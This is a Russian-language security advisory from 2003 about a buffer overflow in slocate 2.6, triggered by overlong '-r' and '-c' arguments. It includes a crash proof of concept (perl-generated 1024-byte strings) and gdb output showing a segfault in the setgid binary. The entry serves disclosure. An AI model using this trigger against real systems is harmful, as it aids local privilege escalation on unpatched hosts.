Переполнение буфера в slocate
| Дата публикации: | 30.01.2003 |
| Всего просмотров: | 1046 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в slocate - программе, поставляемой с RedHat linux и другими linux системами. Как сообщается, переполнение буфера происходит при запуске slocate программы с чрезмерно длинными (более 1024 байт) аргументами командной строки ('-r' и '-c'). Уязвимость позволяет локальному атакующему выполнить произвольный код с повышенными привилегиями. Пример: [inkubus@USG audit]$ rpm -qf /usr/bin/slocate && ls -al /usr/bin/slocate slocate-2.6-1 - -rwxr-sr-x 1 root slocate 25020 Jun 25 2001 /usr/bin/slocate [inkubus@USG audit]$ /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"` Segmentation fault [inkubus@USG audit]$ gdb /usr/bin/slocate GNU gdb Red Hat Linux (5.1.90CVS-5) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)... (gdb) r -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"` Starting program: /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"` warning: slocate: could not open database: /var/lib/slocate/slocate.db: Permission denied warning: You need to run the 'updatedb' command (as root) to create the database. warning: slocate: decode_db(): ÐßBÐßBØßBØßBàßBàßBèßBèßBðßBðßBøßBøßB: No such file or directory warning: You need to run the 'updatedb' command (as root) to create the database. (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x42080b1b in strlen () from /lib/i686/libc.so.6 (gdb)Уязвимость обнаружена в slocate 2.6 |
| Ссылки: | USG Security Advisory (slocate) |